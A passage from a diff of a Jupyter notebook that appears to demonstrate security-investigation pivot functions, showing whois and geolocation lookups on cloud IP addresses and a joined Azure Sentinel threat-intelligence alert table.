+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.84.112.117</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>397</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>410</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>720</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>923</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>104.208.0.0/13</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2014-10-01</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>104.214.50.229</td>\n",
+       "      <td>[{'cidr': '104.208.0.0/13', 'name': 'MSFT', 'handle': 'NET-104-208-0-0-1', 'range': '104.208.0.0...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>924</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.51.104.164</td>\n",
+       "      <td>[{'cidr': '20.34.0.0/15, 20.48.0.0/12, 20.64.0.0/10, 20.33.0.0/16, 20.40.0.0/13, 20.36.0.0/14, 2...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>925</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.64.0.0/10</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.81.40.144</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.48.0.0/12, 20.34.0.0/15, 20.64.0.0/10, 20.36.0.0/14, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>926</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.64.0.0/10</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.80.162.44</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.48.0.0/12, 20.34.0.0/15, 20.64.0.0/10, 20.36.0.0/14, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>927</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>928</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>104.208.0.0/13</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2014-10-01</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>104.215.76.44</td>\n",
+       "      <td>[{'cidr': '104.208.0.0/13', 'name': 'MSFT', 'handle': 'NET-104-208-0-0-1', 'range': '104.208.0.0...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1017</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1923</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.64.0.0/10</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.81.42.55</td>\n",
+       "      <td>[{'cidr': '20.34.0.0/15, 20.36.0.0/14, 20.48.0.0/12, 20.64.0.0/10, 20.128.0.0/16, 20.33.0.0/16, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3290</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.48.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.55.80.232</td>\n",
+       "      <td>[{'cidr': '20.34.0.0/15, 20.36.0.0/14, 20.48.0.0/12, 20.64.0.0/10, 20.128.0.0/16, 20.33.0.0/16, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4381</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5542</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>ripencc</td>\n",
+       "      <td>207812</td>\n",
+       "      <td>79.124.62.0/24</td>\n",
+       "      <td>BG</td>\n",
+       "      <td>2007-07-31</td>\n",
+       "      <td>DM_AUTO, BG</td>\n",
+       "      <td>79.124.62.82</td>\n",
+       "      <td>[{'cidr': '79.124.62.0/24', 'name': 'CLOUDVPS-NET', 'handle': 'NOC299-RIPE', 'range': '79.124.62...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "      nir asn_registry     asn        asn_cidr asn_country_code    asn_date  \\\n",
+       "0     NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "1     NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "2     NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "3     NaN         arin   14618     3.80.0.0/12               US  2017-12-20   \n",
+       "4     NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "17    NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "68    NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "69    NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "70    NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "105   NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "272   NaN         arin    8075   52.160.0.0/11               US  2015-11-24   \n",
+       "273   NaN         arin    8075   52.160.0.0/11               US  2015-11-24   \n",
+       "275   NaN         arin    8075    20.64.0.0/10               US  2017-10-18   \n",
+       "276   NaN         arin    8075    20.48.0.0/12               US  2017-10-18   \n",
+       "392   NaN         arin    8075    20.64.0.0/10               US  2017-10-18   \n",
+       "397   NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "410   NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "720   NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "923   NaN         arin    8075  104.208.0.0/13               US  2014-10-01   \n",
+       "924   NaN         arin    8075    20.48.0.0/12               US  2017-10-18   \n",
+       "925   NaN         arin    8075    20.64.0.0/10               US  2017-10-18   \n",
+       "926   NaN         arin    8075    20.64.0.0/10               US  2017-10-18   \n",
+       "927   NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "928   NaN         arin    8075  104.208.0.0/13               US  2014-10-01   \n",
+       "1017  NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "1923  NaN         arin    8075    20.64.0.0/10               US  2017-10-18   \n",
+       "3290  NaN         arin    8075    20.48.0.0/12               US  2017-10-18   \n",
+       "4381  NaN          NaN     NaN             NaN              NaN         NaN   \n",
+       "5542  NaN      ripencc  207812  79.124.62.0/24               BG  2007-07-31   \n",
+       "\n",
+       "                      asn_description           query  \\\n",
+       "0                                 NaN             NaN   \n",
+       "1                                 NaN             NaN   \n",
+       "2                                 NaN             NaN   \n",
+       "3                      AMAZON-AES, US     3.88.48.125   \n",
+       "4                                 NaN             NaN   \n",
+       "17                                NaN             NaN   \n",
+       "68                                NaN             NaN   \n",
+       "69                                NaN             NaN   \n",
+       "70                                NaN             NaN   \n",
+       "105                               NaN             NaN   \n",
+       "272   MICROSOFT-CORP-MSN-AS-BLOCK, US    52.171.57.74   \n",
+       "273   MICROSOFT-CORP-MSN-AS-BLOCK, US   52.171.36.115   \n",
+       "275   MICROSOFT-CORP-MSN-AS-BLOCK, US     20.84.105.0   \n",
+       "276   MICROSOFT-CORP-MSN-AS-BLOCK, US    20.55.97.123   \n",
+       "392   MICROSOFT-CORP-MSN-AS-BLOCK, US   20.84.112.117   \n",
+       "397                               NaN             NaN   \n",
+       "410                               NaN             NaN   \n",
+       "720                               NaN             NaN   \n",
+       "923   MICROSOFT-CORP-MSN-AS-BLOCK, US  104.214.50.229   \n",
+       "924   MICROSOFT-CORP-MSN-AS-BLOCK, US   20.51.104.164   \n",
+       "925   MICROSOFT-CORP-MSN-AS-BLOCK, US    20.81.40.144   \n",
+       "926   MICROSOFT-CORP-MSN-AS-BLOCK, US    20.80.162.44   \n",
+       "927                               NaN             NaN   \n",
+       "928   MICROSOFT-CORP-MSN-AS-BLOCK, US   104.215.76.44   \n",
+       "1017                              NaN             NaN   \n",
+       "1923  MICROSOFT-CORP-MSN-AS-BLOCK, US     20.81.42.55   \n",
+       "3290  MICROSOFT-CORP-MSN-AS-BLOCK, US    20.55.80.232   \n",
+       "4381                              NaN             NaN   \n",
+       "5542                      DM_AUTO, BG    79.124.62.82   \n",
+       "\n",
+       "                                                                                                     nets  \\\n",
+       "0                                                                                                     NaN   \n",
+       "1                                                                                                     NaN   \n",
+       "2                                                                                                     NaN   \n",
+       "3     [{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...   \n",
+       "4                                                                                                     NaN   \n",
+       "17                                                                                                    NaN   \n",
+       "68                                                                                                    NaN   \n",
+       "69                                                                                                    NaN   \n",
+       "70                                                                                                    NaN   \n",
+       "105                                                                                                   NaN   \n",
+       "272   [{'cidr': '52.160.0.0/11, 52.148.0.0/14, 52.152.0.0/13, 52.145.0.0/16, 52.146.0.0/15', 'name': '...   \n",
+       "273   [{'cidr': '52.145.0.0/16, 52.146.0.0/15, 52.152.0.0/13, 52.160.0.0/11, 52.148.0.0/14', 'name': '...   \n",
+       "275   [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "276   [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "392   [{'cidr': '20.128.0.0/16, 20.64.0.0/10, 20.40.0.0/13, 20.36.0.0/14, 20.48.0.0/12, 20.34.0.0/15, ...   \n",
+       "397                                                                                                   NaN   \n",
+       "410                                                                                                   NaN   \n",
+       "720                                                                                                   NaN   \n",
+       "923   [{'cidr': '104.208.0.0/13', 'name': 'MSFT', 'handle': 'NET-104-208-0-0-1', 'range': '104.208.0.0...   \n",
+       "924   [{'cidr': '20.34.0.0/15, 20.48.0.0/12, 20.64.0.0/10, 20.33.0.0/16, 20.40.0.0/13, 20.36.0.0/14, 2...   \n",
+       "925   [{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.48.0.0/12, 20.34.0.0/15, 20.64.0.0/10, 20.36.0.0/14, ...   \n",
+       "926   [{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.48.0.0/12, 20.34.0.0/15, 20.64.0.0/10, 20.36.0.0/14, ...   \n",
+       "927                                                                                                   NaN   \n",
+       "928   [{'cidr': '104.208.0.0/13', 'name': 'MSFT', 'handle': 'NET-104-208-0-0-1', 'range': '104.208.0.0...   \n",
+       "1017                                                                                                  NaN   \n",
+       "1923  [{'cidr': '20.34.0.0/15, 20.36.0.0/14, 20.48.0.0/12, 20.64.0.0/10, 20.128.0.0/16, 20.33.0.0/16, ...   \n",
+       "3290  [{'cidr': '20.34.0.0/15, 20.36.0.0/14, 20.48.0.0/12, 20.64.0.0/10, 20.128.0.0/16, 20.33.0.0/16, ...   \n",
+       "4381                                                                                                  NaN   \n",
+       "5542  [{'cidr': '79.124.62.0/24', 'name': 'CLOUDVPS-NET', 'handle': 'NOC299-RIPE', 'range': '79.124.62...   \n",
+       "\n",
+       "      raw  referral  raw_referral  \n",
+       "0     NaN       NaN           NaN  \n",
+       "1     NaN       NaN           NaN  \n",
+       "2     NaN       NaN           NaN  \n",
+       "3     NaN       NaN           NaN  \n",
+       "4     NaN       NaN           NaN  \n",
+       "17    NaN       NaN           NaN  \n",
+       "68    NaN       NaN           NaN  \n",
+       "69    NaN       NaN           NaN  \n",
+       "70    NaN       NaN           NaN  \n",
+       "105   NaN       NaN           NaN  \n",
+       "272   NaN       NaN           NaN  \n",
+       "273   NaN       NaN           NaN  \n",
+       "275   NaN       NaN           NaN  \n",
+       "276   NaN       NaN           NaN  \n",
+       "392   NaN       NaN           NaN  \n",
+       "397   NaN       NaN           NaN  \n",
+       "410   NaN       NaN           NaN  \n",
+       "720   NaN       NaN           NaN  \n",
+       "923   NaN       NaN           NaN  \n",
+       "924   NaN       NaN           NaN  \n",
+       "925   NaN       NaN           NaN  \n",
+       "926   NaN       NaN           NaN  \n",
+       "927   NaN       NaN           NaN  \n",
+       "928   NaN       NaN           NaN  \n",
+       "1017  NaN       NaN           NaN  \n",
+       "1923  NaN       NaN           NaN  \n",
+       "3290  NaN       NaN           NaN  \n",
+       "4381  NaN       NaN           NaN  \n",
+       "5542  NaN       NaN           NaN  "
+      ]
+     },
+     "execution_count": 58,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.util.whois(data=ips_df, column=\"IP\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Simple pipeline\n",
+    "\n",
+    "Note:\n",
+    "- inline query to filter to only \"Public\" IPs\n",
+    "- `mp_pivot.display` function to display intermediate results"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 59,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<h3>Geo Lookup</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>City</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Ashburn</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>52.171.57.74</td>\n",
+       "      <td>San Antonio</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>52.171.36.115</td>\n",
+       "      <td>San Antonio</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>20.84.105.0</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>20.55.97.123</td>\n",
+       "      <td>Washington</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>20.84.112.117</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>104.214.50.229</td>\n",
+       "      <td>San Antonio</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>20.51.104.164</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>20.81.40.144</td>\n",
+       "      <td>Washington</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>20.80.162.44</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "               IP         City\n",
+       "0     3.88.48.125      Ashburn\n",
+       "1    52.171.57.74  San Antonio\n",
+       "2   52.171.36.115  San Antonio\n",
+       "3     20.84.105.0         None\n",
+       "4    20.55.97.123   Washington\n",
+       "5   20.84.112.117         None\n",
+       "6  104.214.50.229  San Antonio\n",
+       "7   20.51.104.164         None\n",
+       "8    20.81.40.144   Washington\n",
+       "9    20.80.162.44         None"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type_x</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>...</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type_y</th>\n",
+       "      <th>SystemAlertId1</th>\n",
+       "      <th>ExtendedProperties1</th>\n",
+       "      <th>Entities1</th>\n",
+       "      <th>MatchingIps</th>\n",
+       "      <th>src_row_index</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>...</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 14:57:45+00:00</td>\n",
+       "      <td>2020-11-20 15:08:56+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>a9954983-cc15-8b65-8e2d-ae268e8c6cb5</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"bigbonsai-music.de\\\") | where T...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"bigbonsai-music.de\",\\r\\n    \"HostName\": \"bigbon...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>None</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
+       "      <td>AMAZON-AES, US</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>[{'cidr': '3.0.0.0/9', 'name': 'AT-88-Z', 'handle': 'NET-3-0-0-0-1', 'range': '3.0.0.0 - 3.127.2...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Ashburn</td>\n",
+       "      <td>-77.4728</td>\n",
+       "      <td>39.0481</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
